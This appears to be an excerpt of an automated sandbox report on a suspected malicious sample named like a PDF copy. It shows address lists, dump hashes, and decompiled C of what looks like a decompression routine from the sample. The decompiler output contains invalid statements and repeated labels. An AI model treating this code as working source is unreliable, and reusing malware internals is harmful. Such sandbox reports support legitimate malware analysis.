                                                                                            0x00406f79
                                                                                            0x00407581
                                                                                            0x00000000
                                                                                            0x00407581
                                                                                            0x00406f7f
                                                                                            0x00406f82
                                                                                            0x00406f85
                                                                                            0x00406f89
                                                                                            0x00406f8c
                                                                                            0x00406f92
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f94
                                                                                            0x00406f97
                                                                                            0x00406f9a
                                                                                            0x00406f9a
                                                                                            0x00406fa0
                                                                                            0x00406f3e
                                                                                            0x00406f3e
                                                                                            0x00406f41
                                                                                            0x00000000
                                                                                            0x00406f41
                                                                                            0x00406fa2
                                                                                            0x00406fa2
                                                                                            0x00406fa5
                                                                                            0x00406fa8
                                                                                            0x00406fab
                                                                                            0x00406fae
                                                                                            0x00406fb1
                                                                                            0x00406fb4
                                                                                            0x00406fb7
                                                                                            0x00406fba
                                                                                            0x00406fbd
                                                                                            0x00406fc0
                                                                                            0x00406fd8
                                                                                            0x00406fdb
                                                                                            0x00406fde
                                                                                            0x00406fe1
                                                                                            0x00406fe1
                                                                                            0x00406fe4
                                                                                            0x00406fe8
                                                                                            0x00406fea
                                                                                            0x00406fc2
                                                                                            0x00406fc2
                                                                                            0x00406fca
                                                                                            0x00406fcf
                                                                                            0x00406fd1
                                                                                            0x00406fd3
                                                                                            0x00406fd3
                                                                                            0x00406fed
                                                                                            0x00406ff4
                                                                                            0x00406ff7
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00406ff9
                                                                                            0x00000000
                                                                                            0x00407286
                                                                                            0x00407286
                                                                                            0x0040728a
                                                                                            0x004075b1
                                                                                            0x00000000
                                                                                            0x004075b1
                                                                                            0x00407290
                                                                                            0x00407293
                                                                                            0x00407296
                                                                                            0x0040729a
                                                                                            0x0040729d
                                                                                            0x004072a3
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a5
                                                                                            0x004072a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407395
                                                                                            0x00407399
                                                                                            0x004073bb
                                                                                            0x004073be
                                                                                            0x004073c8
                                                                                            0x00000000
                                                                                            0x004073c8
                                                                                            0x0040739b
                                                                                            0x0040739e
                                                                                            0x004073a2
                                                                                            0x004073a5
                                                                                            0x004073a5
                                                                                            0x004073a8
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407452
                                                                                            0x00407456
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x00407474
                                                                                            0x0040747b
                                                                                            0x00407482
                                                                                            0x00407489
                                                                                            0x00407489
                                                                                            0x00000000
                                                                                            0x00407489
                                                                                            0x00407458
                                                                                            0x0040745b
                                                                                            0x0040745e
                                                                                            0x00407461
                                                                                            0x00407468
                                                                                            0x004073ac
                                                                                            0x004073ac
                                                                                            0x004073af
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407543
                                                                                            0x00407546
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040717d
                                                                                            0x0040717f
                                                                                            0x00407186
                                                                                            0x00407187
                                                                                            0x00407189
                                                                                            0x0040718c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407194
                                                                                            0x00407197
                                                                                            0x0040719a
                                                                                            0x0040719c
                                                                                            0x0040719e
                                                                                            0x0040719e
                                                                                            0x0040719f
                                                                                            0x004071a2
                                                                                            0x004071a9
                                                                                            0x004071ac
                                                                                            0x004071ba
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407490
                                                                                            0x00407490
                                                                                            0x00407493
                                                                                            0x0040749a
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040749f
                                                                                            0x0040749f
                                                                                            0x004074a3
                                                                                            0x004075db
                                                                                            0x00000000
                                                                                            0x004075db
                                                                                            0x004074a9
                                                                                            0x004074ac
                                                                                            0x004074af
                                                                                            0x004074b3
                                                                                            0x004074b6
                                                                                            0x004074bc
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074be
                                                                                            0x004074c1
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c4
                                                                                            0x004074c7
                                                                                            0x004074c7
                                                                                            0x004074cb
                                                                                            0x0040752b
                                                                                            0x0040752e
                                                                                            0x00407533
                                                                                            0x00407534
                                                                                            0x00407536
                                                                                            0x00407538
                                                                                            0x0040753b
                                                                                            0x00000000
                                                                                            0x0040753b
                                                                                            0x004074cd
                                                                                            0x004074d3
                                                                                            0x004074d6
                                                                                            0x004074d9
                                                                                            0x004074dc
                                                                                            0x004074df
                                                                                            0x004074e2
                                                                                            0x004074e5
                                                                                            0x004074e8
                                                                                            0x004074eb
                                                                                            0x004074ee
                                                                                            0x00407507
                                                                                            0x0040750a
                                                                                            0x0040750d
                                                                                            0x00407510
                                                                                            0x00407514
                                                                                            0x00407516
                                                                                            0x00407516
                                                                                            0x00407517
                                                                                            0x0040751a
                                                                                            0x004074f0
                                                                                            0x004074f0
                                                                                            0x004074f8
                                                                                            0x004074fd
                                                                                            0x004074ff
                                                                                            0x00407502
                                                                                            0x00407502
                                                                                            0x0040751d
                                                                                            0x00407524
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x00407526
                                                                                            0x00000000
                                                                                            0x004071c2
                                                                                            0x004071c5
                                                                                            0x004071fb
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732b
                                                                                            0x0040732e
                                                                                            0x0040732e
                                                                                            0x00407331
                                                                                            0x00407333
                                                                                            0x004075bd
                                                                                            0x00000000
                                                                                            0x004075bd
                                                                                            0x00407339
                                                                                            0x0040733c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407342
                                                                                            0x00407346
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00407349
                                                                                            0x00000000
                                                                                            0x00407349
                                                                                            0x004071c7
                                                                                            0x004071c9
                                                                                            0x004071cb
                                                                                            0x004071cd
                                                                                            0x004071d0
                                                                                            0x004071d1
                                                                                            0x004071d3
                                                                                            0x004071d5
                                                                                            0x004071d8
                                                                                            0x004071db
                                                                                            0x004071f1
                                                                                            0x004071f6
                                                                                            0x0040722e
                                                                                            0x0040722e
                                                                                            0x00407232
                                                                                            0x0040725e
                                                                                            0x00407260
                                                                                            0x00407267
                                                                                            0x0040726a
                                                                                            0x0040726d
                                                                                            0x0040726d
                                                                                            0x00407272
                                                                                            0x00407272
                                                                                            0x00407274
                                                                                            0x00407277
                                                                                            0x0040727e
                                                                                            0x00407281
                                                                                            0x004072ae
                                                                                            0x004072ae
                                                                                            0x004072b1
                                                                                            0x004072b4
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00407328
                                                                                            0x00000000
                                                                                            0x00407328
                                                                                            0x004072b6
                                                                                            0x004072bc
                                                                                            0x004072bf
                                                                                            0x004072c2
                                                                                            0x004072c5
                                                                                            0x004072c8
                                                                                            0x004072cb
                                                                                            0x004072ce
                                                                                            0x004072d1
                                                                                            0x004072d4
                                                                                            0x004072d7
                                                                                            0x004072f0
                                                                                            0x004072f2
                                                                                            0x004072f5
                                                                                            0x004072f6
                                                                                            0x004072f9
                                                                                            0x004072fb
                                                                                            0x004072fe
                                                                                            0x00407300
                                                                                            0x00407302
                                                                                            0x00407305
                                                                                            0x00407307
                                                                                            0x0040730a
                                                                                            0x0040730e
                                                                                            0x00407310
                                                                                            0x00407310
                                                                                            0x00407311
                                                                                            0x00407314
                                                                                            0x00407317
                                                                                            0x004072d9
                                                                                            0x004072d9
                                                                                            0x004072e1
                                                                                            0x004072e6
                                                                                            0x004072e8
                                                                                            0x004072eb
                                                                                            0x004072eb
                                                                                            0x0040731a
                                                                                            0x00407321
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x004072ab
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00000000
                                                                                            0x00407323
                                                                                            0x00407321
                                                                                            0x00407234
                                                                                            0x00407237
                                                                                            0x00407239
                                                                                            0x0040723c
                                                                                            0x0040723f
                                                                                            0x00407242
                                                                                            0x00407244
                                                                                            0x00407247
                                                                                            0x0040724a
                                                                                            0x0040724a
                                                                                            0x0040724d
                                                                                            0x0040724d
                                                                                            0x00407250
                                                                                            0x00407257
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x0040722b
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00000000
                                                                                            0x00407259
                                                                                            0x00407257
                                                                                            0x004071dd
                                                                                            0x004071e0
                                                                                            0x004071e2
                                                                                            0x004071e5
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406f44
                                                                                            0x00406f44
                                                                                            0x00406f48
                                                                                            0x0040758d
                                                                                            0x00000000
                                                                                            0x0040758d
                                                                                            0x00406f4e
                                                                                            0x00406f51
                                                                                            0x00406f54
                                                                                            0x00406f57
                                                                                            0x00406f5a
                                                                                            0x00406f5d
                                                                                            0x00406f60
                                                                                            0x00406f62
                                                                                            0x00406f65
                                                                                            0x00406f68
                                                                                            0x00406f6b
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00406f6d
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x0040734c
                                                                                            0x00407350
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00407356
                                                                                            0x00407359
                                                                                            0x0040735c
                                                                                            0x0040735f
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407361
                                                                                            0x00407364
                                                                                            0x00407367
                                                                                            0x0040736a
                                                                                            0x0040736d
                                                                                            0x00407370
                                                                                            0x00407373
                                                                                            0x00407374
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407376
                                                                                            0x00407379
                                                                                            0x0040737c
                                                                                            0x0040737f
                                                                                            0x00407382
                                                                                            0x00407385
                                                                                            0x00407389
                                                                                            0x0040738b
                                                                                            0x0040738e
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x00000000
                                                                                            0x00407390
                                                                                            0x0040738e
                                                                                            0x004075c3
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00406bf2

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.269472376.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.269465559.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269481310.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269490157.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.269527274.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_TTCopy-240323-PDF.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                            • Instruction ID: 0a676f48c9952aad729ccf503b6a86ce95496029d8c73069f89f3073be052f6e
                                                                                            • Opcode Fuzzy Hash: 93c083d05bcdf6195ca23c2a54f1652f9efbc2f2339d63ff2f761c89645e7c92
                                                                                            • Instruction Fuzzy Hash: C3813471D08228DFDF24CFA8C8847ADBBB1FB44305F24816AD456BB281D778A986DF05
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00406FFE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 98%
                                                                                            			E00406FFE() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M00407602))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
